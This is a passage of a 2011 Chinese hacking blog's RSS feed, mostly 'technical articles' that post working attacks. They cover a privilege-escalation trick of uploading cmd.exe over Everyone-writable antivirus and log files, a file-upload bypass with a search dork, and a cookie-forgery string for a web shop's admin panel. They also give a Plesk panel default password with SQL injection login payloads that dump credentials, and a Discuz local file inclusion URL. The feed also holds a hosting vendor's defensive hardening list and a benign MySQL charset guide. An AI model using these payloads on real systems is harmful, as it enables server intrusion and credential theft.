IISrewrite3 
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log 
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf 
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\error.log 
处理办法:将三个文件的权限改成erveryone只读权限(没有写的权限)


DU Meter的流量统计信息日志文件 
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv 
处理办法:删除它

诺顿 
c:\Program Files\Common Files\Symantec Shared\Persist.bak 
c:\Program Files\Common Files\Symantec Shared\Validate.dat 
c:\Program Files\Common Files\Symantec Shared\Persist.Dat 
处理办法:直接完全删除这个软件

华盾 
文件:C:\WINDOWS\hchiblis.ibl 
处理办法:直接完全删除这个过滤软件,如果因为别的原因不能删除,可以将权限改成everyone读与写,不能有everyone运行的权限.

一流过滤: 
文件:C:\7i24.com\iissafe\log\startandiischeck.txt 
文件:C:\7i24.com\iissafe\log\scanlog.htm 
如果已经是最新版本的一流(2011-2-19)就不需要处理,如果是旧版本的,要先删除这两个文件,然后再升级一流.正常情况下,这两个文件只有everyone读写的权限(没有运行)


其他有可能提示的文件: 
文件:C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\index.dat 
文件:C:\WINDOWS\Temp\History\History.IE5\index.dat 
文件:C:\WINDOWS\Temp\Cookies\index.dat 
检查文件在高级权限管理中,是不是有everyone运行的权限,如果没有,就不用处理,如果有运行的权限要取消运行权限

文件:C:\7i24.com\LinkGate\log\.... 
目录:C:\7i24.com\LinkGate\log 
目录:C:\7i24.com\serverdoctor\log\ 
文件:C:\7i24.com\serverdoctor\log\.... 
不需要处理,星外的防盗链,服务器医生等软件默认已自动设置好权限

如果看下这样的提示: 
2011-6-8 15:04:50,方法失败，意外错误代码为 32。 
这是扫描软盘A:造成的,不用处理

部分zend版本可能有这个提示: 
文件:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 
目录:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x...... 
处理办法:将everyone的权限删除,改成adms,system全部权限,users只读权限.


处理后,请再用星外杀马扫描一次.]]></description>
			<content:encoded><![CDATA[<p>声明，这不是什么星外0DAY，这充其量只是一个在找不到可写可执行目录的一个提权思路。我不敢说是我最先发现的，可能有其他人也发现了，并且也在利用了。<br />
其实无数实例证明了lcx前辈那句话，细节决定成败。这只是入侵渗透中的细节问题，刚好我注意到了。下面正文开始。</p>
<p>众所周知要成功提权星外主机就要找到可写可执行目录，可近来星外主机的目录设置越来越BT，几乎没有可写可执行目录。所以另一个“提权思路”出现了。寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换，将这些文件替换为我们的cmd.exe和cscript.exe来提权，经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行。</p>
<p>首先是我们可爱的360杀毒。</p>
<p>c:\Program Files\360\360Safe\AntiSection\mutex.db 360杀毒数据库文件<br />
c:\Program Files\360\360Safe\deepscan\Section\mutex.db 360杀毒数据库文件<br />
c:\Program Files\360\360sd\Section\mutex.db 360杀毒数据库文件</p>
<p>c:\Program Files\360\360Safe\deepscan\Section\mutex.db这个文件，只要安装了360杀毒就一定存在，并且有Everyone权限。其他2个文件不一定。</p>
<p>c:\Program Files\Helicon\ISAPI_Rewrite3\error.log 伪静态设置软件ISAPI Rewrite日志文件<br />
c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log 伪静态设置软件ISAPI Rewrite日志文件<br />
c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf 伪静态设置软件ISAPI Rewrite配置文件</p>
<p>主要是ISAPI Rewrite 3.0版本存在权限问题，老版本暂时没发现有此类问题。</p>
<p>c:\Program Files\Common Files\Symantec Shared\Persist.bak 诺顿杀毒事件日志文件</p>
<p>c:\Program Files\Common Files\Symantec Shared\Validate.dat 诺顿杀毒事件日志文件</p>
<p>c:\Program Files\Common Files\Symantec Shared\Persist.Dat 诺顿杀毒事件日志文件</p>
<p>诺顿杀毒可能局限于版本，我本机XP并未找到以上文件</p>
<p>以下是最后2个可替换文件<br />
c:\windows\hchiblis.ibl 华盾服务器管理专家文件许可证</p>
<p>c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv</p>
<p>DU Meter的流量统计信息日志文件</p>
<p>暂时知道以上文件权限为Everyone，注意，即使可替换文件的所在目录你无权访问，也照样可以替换执行。比如D:\Program Files\360\360Safe\deepscan\Section\mutex.db，可D:\Program Files\360\360Safe\deepscan\Section目录没有访问权限，用BIN牛的aspx大马访问D:\Program Files\360\360Safe\deepscan\Sectio显示拒绝访问，可mutex.db文件在该目录下，你照样可以上传由cmd.exe换名后的mutex.db文件进行替换。</p>
<p>这样一来在没有找到可写可执行目录时候，不防查看服务器上是否安装了以上软件，有的话可以上传同文件名替换原文件为你的提权文件。这样就可以成功执行了。</p>
<p>===========================================================================</p>
<p>目录或文件的权限设置有错会造成入侵!<br />
为了从根本上解决问题,我们建议所有用户升级受控端安装包到2011-3-15版,并点击设置”ASP.net严格安全模型”,以下所说的问题所有设置了asp.net严格安全的用户不受影响.</p>
<p>对于服务器上的杀毒软件,我们建议装Mcafee,请不重装360,很多版本的360都有提权问题.</p>
<p>在2011-6-8星外发布了新版的星外杀马扫描工具(在群共享或星外后台可以下载)</p>
<p>在扫描结果中我们发现在大量服务器存在以下问题.</p>
<p>文件:C:\WINDOWS\TAPI\tsec.ini<br />
处理办法:直接完全删除这个文件(不要保留在回收站)</p>
<p>360的<br />
文件:C:\Program Files\360\360sd\Section\mutex.db<br />
文件:C:\Program Files\360\360Safe\deepscan\Section\mutex.db<br />
文件:C:\Program Files\360\360Safe\AntiSection\mutex.db<br />
处理办法:直接完全删除360,所有360删除光后留下的文件都要删除</p>
<p>Flash:<br />
文件:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx<br />
处理办法:直接完全删除(不要保留在回收站),不要在服务器上装Flash组件</p>
<p>IISrewrite3<br />
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log<br />
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf<br />
文件:C:\Program Files\Helicon\ISAPI_Rewrite3\error.log<br />
处理办法:将三个文件的权限改成erveryone只读权限(没有写的权限)</p>
<p>DU Meter的流量统计信息日志文件<br />
c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv<br />
处理办法:删除它</p>
<p>诺顿<br />
c:\Program Files\Common Files\Symantec Shared\Persist.bak<br />
c:\Program Files\Common Files\Symantec Shared\Validate.dat<br />
c:\Program Files\Common Files\Symantec Shared\Persist.Dat<br />
处理办法:直接完全删除这个软件</p>
<p>华盾<br />
文件:C:\WINDOWS\hchiblis.ibl<br />
处理办法:直接完全删除这个过滤软件,如果因为别的原因不能删除,可以将权限改成everyone读与写,不能有everyone运行的权限.</p>
<p>一流过滤:<br />
文件:C:\7i24.com\iissafe\log\startandiischeck.txt<br />
文件:C:\7i24.com\iissafe\log\scanlog.htm<br />
如果已经是最新版本的一流(2011-2-19)就不需要处理,如果是旧版本的,要先删除这两个文件,然后再升级一流.正常情况下,这两个文件只有everyone读写的权限(没有运行)</p>
<p>其他有可能提示的文件:<br />
文件:C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\index.dat<br />
文件:C:\WINDOWS\Temp\History\History.IE5\index.dat<br />
文件:C:\WINDOWS\Temp\Cookies\index.dat<br />
检查文件在高级权限管理中,是不是有everyone运行的权限,如果没有,就不用处理,如果有运行的权限要取消运行权限</p>
<p>文件:C:\7i24.com\LinkGate\log\&#8230;.<br />
目录:C:\7i24.com\LinkGate\log<br />
目录:C:\7i24.com\serverdoctor\log\<br />
文件:C:\7i24.com\serverdoctor\log\&#8230;.<br />
不需要处理,星外的防盗链,服务器医生等软件默认已自动设置好权限</p>
<p>如果看下这样的提示:<br />
2011-6-8 15:04:50,方法失败，意外错误代码为 32。<br />
这是扫描软盘A:造成的,不用处理</p>
<p>部分zend版本可能有这个提示:<br />
文件:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll<br />
目录:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x&#8230;&#8230;<br />
处理办法:将everyone的权限删除,改成adms,system全部权限,users只读权限.</p>
<p>处理后,请再用星外杀马扫描一次.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/freehost-mention-the-right-to-new-ideas/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>杰奇小说连载系统任意文件上传0day</title>
		<link>http://www.misssky.cn/technical-articles/jieqi-serialized-novel-system-arbitrary-file-upload-0day/</link>
		<comments>http://www.misssky.cn/technical-articles/jieqi-serialized-novel-system-arbitrary-file-upload-0day/#comments</comments>
		<pubDate>Fri, 17 Jun 2011 09:15:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=114</guid>
		<description><![CDATA[注册用户
进入空间-相册-上传
用oprea活firefox修改源码 
有个*.jpg *.gif的地方改成*。*就能上传任意文件

关键字：inurl:modules/space


我也不知道谁的版权   勿喷

js 本地验证上传类型  很少遇到php 有这样的漏洞   作为一个经典的案例吧]]></description>
			<content:encoded><![CDATA[<p>注册用户<br />
进入空间-相册-上传<br />
用oprea活firefox修改源码<br />
有个*.jpg *.gif的地方改成*。*就能上传任意文件</p>
<p>关键字：inurl:modules/space</p>
<p>我也不知道谁的版权   勿喷</p>
<p>js 本地验证上传类型  很少遇到php 有这样的漏洞   作为一个经典的案例吧</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/jieqi-serialized-novel-system-arbitrary-file-upload-0day/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>正版逍遥网店系统 V3.0 COOKIE欺骗漏洞</title>
		<link>http://www.misssky.cn/technical-articles/xiaoyaonetshop-v3-0-cookie-vulnerability/</link>
		<comments>http://www.misssky.cn/technical-articles/xiaoyaonetshop-v3-0-cookie-vulnerability/#comments</comments>
		<pubDate>Tue, 01 Mar 2011 06:07:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=41</guid>
		<description><![CDATA[正版逍遥网店系统 V3.0
BY：风之传说
刚才我挖了一个洞，然后我一个朋友刚好又叫我帮他看源码郁闷又发现了一个~！这人品是咋滴。。
当然还很感谢心灵大牛的指导哈哈~！
OK开始，这是一个网店，本来我想先找注入，貌似注入都过滤了。于是我又来到后台，看了下检测文件，悲剧由此产生：
漏洞文件：checkadmin.asp<div class="hl-surround"><div class="hl-main">&lt;!--r /&gt; if request.cookies(&quot;buyok&quot;)(&quot;admin&quot;)=&quot;&quot; then response.write &quot;&lt;meta http-equiv='refresh' content='0;URL=../admin.asp'&gt;&quot;<br />--&gt;</div></div>大家看到这里一定以为很简单吧，呵呵 直接COOKIE欺骗就可以进后台，如果真的这样我就不发了~！留个悬念让大家去试试。
然后我进入后台，http://127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
index.asp
<div class="hl-surround"><div class="hl-main">&lt;!--#include file=&quot;checkadmin.asp&quot;--&gt;<br /><br /><br /><br /><br /><br />&lt;script&gt;// &lt;![CDATA[<br />if (top != self)top.location.href = &quot;index.asp&quot;; <br />// ]]&amp;gt;&lt;/script&gt;</div></div>看到这里我奇怪了，是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多，最后发现了一个文件。
漏洞文件：include\buyok_functions.asp
下面贴出部分代码：
<div class="hl-surround"><div class="hl-main">set rscheck=conn.execute(&quot;select * from buyok_user where UserId='&quot;&amp;amp;request.cookies(&quot;buyok&quot;)(&quot;userid&quot;)&amp;amp;&quot;'&quot;)<br />if rscheck.eof and rscheck.bof then<br />response.write &quot;&lt;script&gt;// &lt;![CDATA[<br />&quot;<br />response.write &quot;alert('对不起，您还没有注册或登陆。');&quot;<br />response.write &quot;location.href='javascript:history.go(-1)';&quot;<br />response.write &quot;<br />// ]]&amp;gt;&lt;/script&gt;&quot;<br />response.end</div></div>看到这里大家都懂了吧 呵呵~！
OK附上EXP：
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&#38;temp=login&#38;admin=admin;
修改COOKIE 然后直接进入http://l127.0.0.1/admin/index.asp.
后台：http://localhost/admin/login.asp]]></description>
			<content:encoded><![CDATA[<p>正版逍遥网店系统 V3.0<br />
BY：风之传说<br />
刚才我挖了一个洞，然后我一个朋友刚好又叫我帮他看源码郁闷又发现了一个~！这人品是咋滴。。<br />
当然还很感谢心灵大牛的指导哈哈~！<br />
OK开始，这是一个网店，本来我想先找注入，貌似注入都过滤了。于是我又来到后台，看了下检测文件，悲剧由此产生：<br />
漏洞文件：checkadmin.asp
<div class="hl-surround"><div class="hl-main">&lt;!--r /&gt; if request.cookies(&quot;buyok&quot;)(&quot;admin&quot;)=&quot;&quot; then response.write &quot;&lt;meta http-equiv='refresh' content='0;URL=../admin.asp'&gt;&quot;<br />--&gt;</div></div>
<p>大家看到这里一定以为很简单吧，呵呵 直接COOKIE欺骗就可以进后台，如果真的这样我就不发了~！留个悬念让大家去试试。<br />
然后我进入后台，http://127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。<br />
index.asp</p>
<div class="hl-surround"><div class="hl-main">&lt;!--#include file=&quot;checkadmin.asp&quot;--&gt;<br /><br /><br /><br /><br /><br />&lt;script&gt;// &lt;![CDATA[<br />if (top != self)top.location.href = &quot;index.asp&quot;; <br />// ]]&gt;&lt;/script&gt;</div></div>
<p>看到这里我奇怪了，是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。<br />
继续跟进。代码就不发了免得多，最后发现了一个文件。<br />
漏洞文件：include\buyok_functions.asp<br />
下面贴出部分代码：</p>
<div class="hl-surround"><div class="hl-main">set rscheck=conn.execute(&quot;select * from buyok_user where UserId='&quot;&amp;amp;request.cookies(&quot;buyok&quot;)(&quot;userid&quot;)&amp;amp;&quot;'&quot;)<br />if rscheck.eof and rscheck.bof then<br />response.write &quot;&lt;script&gt;// &lt;![CDATA[<br />&quot;<br />response.write &quot;alert('对不起，您还没有注册或登陆。');&quot;<br />response.write &quot;location.href='javascript:history.go(-1)';&quot;<br />response.write &quot;<br />// ]]&gt;&lt;/script&gt;&quot;<br />response.end</div></div>
<p>看到这里大家都懂了吧 呵呵~！<br />
OK附上EXP：<br />
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&amp;temp=login&amp;admin=admin;<br />
修改COOKIE 然后直接进入http://l127.0.0.1/admin/index.asp.<br />
后台：http://localhost/admin/login.asp</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/xiaoyaonetshop-v3-0-cookie-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>plesk panel 虚拟主机管理平台 0day</title>
		<link>http://www.misssky.cn/technical-articles/plesk-panel-virtual-host-management-platform-0day/</link>
		<comments>http://www.misssky.cn/technical-articles/plesk-panel-virtual-host-management-platform-0day/#comments</comments>
		<pubDate>Tue, 01 Mar 2011 05:43:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=102</guid>
		<description><![CDATA[<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td id="postmessage_208775">其实这个漏洞，一年前一个朋友就告诉我了，一直也没怎么玩这个，具体利用 我也没怎么太多去试。好象有点点麻烦， 看到别人都已经放出来了，我也丢出来吧。大家去试吧，


1,在<a href="http://xxxxxx.com:8880/" target="_blank">http://xxxxxx.com:8880</a>这里，默认的管理员账户密码是admin   密码stepu


2，在<a href="https://xxxxx.com:8443/" target="_blank">https://xxxxx.com:8443</a>

mssql版本

账号 ' union select top 1 login+char(124)+passwd from admin_aliases--

报错,爆出账号密码

登陆后server--&#62;remote desktop账号密码一样
拿到服务器权限

mysql版本
'union select '-1 union select 1,1,1#'#   密码填 1</td>
</tr>
</tbody>
</table>]]></description>
			<content:encoded><![CDATA[<table cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td id="postmessage_208775">其实这个漏洞，一年前一个朋友就告诉我了，一直也没怎么玩这个，具体利用 我也没怎么太多去试。好象有点点麻烦， 看到别人都已经放出来了，我也丢出来吧。大家去试吧，</p>
<p>1,在<a href="http://xxxxxx.com:8880/" target="_blank">http://xxxxxx.com:8880</a>这里，默认的管理员账户密码是admin   密码stepu</p>
<p>2，在<a href="https://xxxxx.com:8443/" target="_blank">https://xxxxx.com:8443</a></p>
<p>mssql版本</p>
<p>账号 &#8216; union select top 1 login+char(124)+passwd from admin_aliases&#8211;</p>
<p>报错,爆出账号密码</p>
<p>登陆后server&#8211;&gt;remote desktop账号密码一样<br />
拿到服务器权限</p>
<p>mysql版本<br />
&#8216;union select &#8216;-1 union select 1,1,1#&#8217;#   密码填 1</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/plesk-panel-virtual-host-management-platform-0day/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DISCUZ X1.5 本地文件包含漏洞</title>
		<link>http://www.misssky.cn/technical-articles/discuz-x1-5-local-file-include-vulnerability/</link>
		<comments>http://www.misssky.cn/technical-articles/discuz-x1-5-local-file-include-vulnerability/#comments</comments>
		<pubDate>Tue, 01 Mar 2011 05:40:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[技术文章]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=99</guid>
		<description><![CDATA[DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存。

<div class="hl-surround"><div class="hl-main">config_global.php<br />$_config['cache']['type'] = ‘file’;</div></div>
地址：
http://localhost:8080/bbs/forum.php?mod=post&#38;action=threadsorts&#38;sortid=ygjgj/../../../api/uc

function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}

……
}

http://localhost:8080/bbs/forum.php?mod=post&#38;action=threadsorts&#38;sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。]]></description>
			<content:encoded><![CDATA[<p>DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存。</p>
<div class="hl-surround"><div class="hl-main">config_global.php<br />$_config['cache']['type'] = ‘file’;</div></div>
<p>地址：</p>
<p>http://localhost:8080/bbs/forum.php?mod=post&#038;action=threadsorts&#038;sortid=ygjgj/../../../api/uc</p>
<p>function cachedata($cachenames) {<br />
……<br />
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;<br />
……<br />
if($isfilecache) {<br />
$lostcaches = array();<br />
foreach($cachenames as $cachename) {<br />
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {<br />
$lostcaches[] = $cachename;<br />
}<br />
}</p>
<p>……<br />
}</p>
<p>http://localhost:8080/bbs/forum.php?mod=post&amp;action=threadsorts&amp;sortid=ygjgj/../../../api/ucAuthracation has expiried</p>
<p>执行了 api/uc.php 页面代码了。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/technical-articles/discuz-x1-5-local-file-include-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>mysql移植之将latin1编码更换为utf-8编码</title>
		<link>http://www.misssky.cn/sql/mysql-latin1-to-utf-8/</link>
		<comments>http://www.misssky.cn/sql/mysql-latin1-to-utf-8/#comments</comments>
		<pubDate>Tue, 22 Feb 2011 10:11:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[数据库相关]]></category>

		<guid isPermaLink="false">http://www.misssky.cn/?p=97</guid>
		<description><![CDATA[1、备份数据库

mysqldump --default-character-set=latin1 --create-options=false --set-charset=false -u root -p 数据库名称

>E:\back.sql

2、创建新数据库

CREATE DATABASE 数据库名称 CHARACTER SET utf8 COLLATE utf8_general_ci;

3、导入数据

mysql -u root -p --default-character-set=gbk 数据库名称<E:\back.sql]]></description>
			<content:encoded><![CDATA[<p>1、备份数据库</p>
<p>mysqldump &#8211;default-character-set=latin1 &#8211;create-options=false &#8211;set-charset=false -u root -p 数据库名称</p>
<p>>E:\back.sql</p>
<p>2、创建新数据库</p>
<p>CREATE DATABASE 数据库名称 CHARACTER SET utf8 COLLATE utf8_general_ci;</p>
<p>3、导入数据</p>
<p>mysql -u root -p &#8211;default-character-set=gbk 数据库名称<E:\back.sql</p>
]]></content:encoded>
			<wfw:commentRss>http://www.misssky.cn/sql/mysql-latin1-to-utf-8/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 1.724 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2012-05-20 18:19:44 -->

